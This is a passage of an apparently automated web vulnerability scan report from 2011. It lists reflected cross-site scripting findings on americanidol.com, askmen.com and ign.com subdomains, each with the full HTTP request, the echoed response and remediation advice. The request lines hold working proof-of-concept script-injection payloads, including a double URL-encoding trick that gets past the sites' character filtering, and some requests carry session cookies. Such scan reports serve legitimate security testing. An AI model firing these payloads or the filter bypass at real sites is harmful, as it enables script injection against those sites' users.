Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools40f41%2527%253balert%25281%2529%252f%252f79209a69875/keyslave.one/%22ns=%22netsparker(0x00004A) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3862
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:36 GMT
Connection: close

       function oneWidgetWaitForCookie_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A)() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...
Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A)) {
                   setTimeout(oneWidgetWaitForCookie_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A), 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAlready
...[SNIP]...

1.108. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one/%22ns=%22netsparker(0x00004A)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3c294%253balert%25281%2529%252f%252f0410001729d was submitted in the REST URL parameter 1. This input was echoed as 3c294;alert(1)//0410001729d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools3c294%253balert%25281%2529%252f%252f0410001729d/keyslave.one/%22ns=%22netsparker(0x00004A) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3844
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:36 GMT
Connection: close

       function oneWidgetWaitForCookie_tools3c294;alert(1)//0410001729d_keyslave.one_"ns="netsparker(0x00004A)() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document.
...[SNIP]...

1.109. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95bdb%2527%253balert%25281%2529%252f%252f959d5468c2 was submitted in the REST URL parameter 1. This input was echoed as 95bdb';alert(1)//959d5468c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools95bdb%2527%253balert%25281%2529%252f%252f959d5468c2/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3894
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:40 GMT
Connection: close

       function oneWidgetWaitForCookie_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B))() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...
Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B))) {
                   setTimeout(oneWidgetWaitForCookie_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B)), 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAlread
...[SNIP]...

1.110. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea7bb%253balert%25281%2529%252f%252fd66f8c5aaae was submitted in the REST URL parameter 1. This input was echoed as ea7bb;alert(1)//d66f8c5aaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsea7bb%253balert%25281%2529%252f%252fd66f8c5aaae/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3886
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:41 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsea7bb;alert(1)//d66f8c5aaae_keyslave.one_"ns="netsparker(0x00004B))() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...

1.111. http://wrapper.askmen.com/a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.askmen.com
Path:   /a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7407a<script>alert(1)</script>3466efce8f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=prestitial&network_name_override=askmen&channel_name_override=Homepage&pagetype=am_channel&rf=http%3A%2F%2Fwww.newscorp.com&r=http$3A$2F$2Fwww$2Enewscorp$2Ecom$2Foperations$2Fother$2Ehtml$23&7407a<script>alert(1)</script>3466efce8f4=1 HTTP/1.1
Host: wrapper.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; __utma=173688037.2045369409.1317753551.1317753551.1317756136.2; __utmz=173688037.1317756136.2.2.utmcsr=askmen.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:06:11 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: NGUserID=175e5;Path=/;Domain=.askmen.com;Expires=Wed, 02-Apr-31 20:06:11 GMT
Set-Cookie: freq=c-1317758771058v-1n-29mc+1317758770952mv+0mn+0wwe~0;Path=/;Domain=.askmen.com
Content-Length: 1799


if((typeof ataxscript == 'undefined' || ataxscript.length == 0) &&
(typeof ataximg == 'undefined' || ataximg.length == 0) &&
(typeof showStitial == 'undefined' || !showStitial) &&
(typeof
...[SNIP]...
<"+"script src='http://atax.askmen.com/size=1x1&network=fim&site=askmen&dechannel=askmen&subdomain=www.askmen.com&hosted_id=7700&channel_name_override=Homepage&7407a<script>alert(1)</script>3466efce8f4=1&network_name_override=askmen&pagetype=am_channel&rf=http$253A$252F$252Fwww.newscorp.com&r=http$253A$252F$252Fwww.newscorp.com$252Foperations$252Fother.html$2523&PageId=1317758771058&random=131775877
...[SNIP]...

1.112. http://wrapper.ign.com/a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.ign.com
Path:   /a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7101a<script>alert(1)</script>8b9ff9ff23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=text&Loc=ign.com&pagetype=stitial&dechannel=ign&7101a<script>alert(1)</script>8b9ff9ff23=1 HTTP/1.1
Host: wrapper.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(1)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; rsi_segs=; freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:02:39 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 73166

if(typeof showStitial == 'undefined' || !showStitial){
if(typeof adString == 'undefined') var adString = "";

var tileDate = new Date();
var tile = tileDate.getTime();
var isLinked
...[SNIP]...
<"+"script type='text/javascript' src='http://a.ign-omy.com/js.ng/size=text&network=fim&site=ign&subdomain=xboxlive.ign.com&hosted_id=0&channel_id=58&dechannel=ign&7101a<script>alert(1)</script>8b9ff9ff23=1&pagetype=stitial&reginsider=a&PageId=1317765759443&random=1317765759443&country2=us&server=media-adwrapper-prd-app-01.las1.colo.ignops.com&rsi_segs=&property=ign&tile="+tile+"'>
...[SNIP]...

1.113. http://wrapper.ign.com/a [pagetype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.ign.com
Path:   /a

Issue detail

The value of the pagetype request parameter is copied into the HTML document as plain text between tags. The payload 38ef8<script>alert(1)</script>7c600bdd0ef was submitted in the pagetype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=text&Loc=ign.com&pagetype=stitial38ef8<script>alert(1)</script>7c600bdd0ef&dechannel=ign HTTP/1.1
Host: wrapper.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(1)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; rsi_segs=; freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:02:29 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 73475

if(typeof showStitial == 'undefined' || !showStitial){
if(typeof adString == 'undefined') var adString = "";

var tileDate = new Date();
var tile = tileDate.getTime();
var isLinked
...[SNIP]...
ght 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="ign:ign:stitial38ef8<script>alert(1)</script>7c600bdd0ef";        /* Page Name */
s.server=location.host;
s.prop1="";
s.prop2="ign";            /* Network */
s.prop3="ign";            /* Channel */
s.prop4="stitial38ef8<script>
...[SNIP]...

1.114. http://www.americanidol.com/photos/hothome/ [all parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /photos/hothome/

Issue detail

The value of the all request parameter is copied into the HTML document as plain text between tags. The payload 638f0<a>0a93004fbcc was submitted in the all parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=1&all=true638f0<a>0a93004fbcc HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:05 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:05 GMT
Content-Length: 16409
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=1&all=true638f0<a>0a93004fbcc]]>
...[SNIP]...

1.115. http://www.americanidol.com/photos/hothome/ [feed parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /photos/hothome/

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 89dc6<a>edda9f5fe41 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=189dc6<a>edda9f5fe41&all=true HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:04 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:04 GMT
Content-Length: 16409
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=189dc6<a>edda9f5fe41&all=true]]>
...[SNIP]...

1.116. http://www.americanidol.com/photos/hothome/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /photos/hothome/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef2e2<a>0d1a3c47574 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=1&all=true&ef2e2<a>0d1a3c47574=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:07 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:07 GMT
Content-Length: 16412
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=1&all=true&ef2e2<a>0d1a3c47574=1]]>
...[SNIP]...

1.117. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c4217<a>ba34a50088c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qtyc4217<a>ba34a50088c/12?feed=1&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172795
Date: Tue, 04 Oct 2011 20:13:09 GMT
Content-Length: 15316
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qtyc4217<a>ba34a50088c/12?feed=1&dfpzone=idol_home]]>
...[SNIP]...

1.118. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19773<a>f6cff111e75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

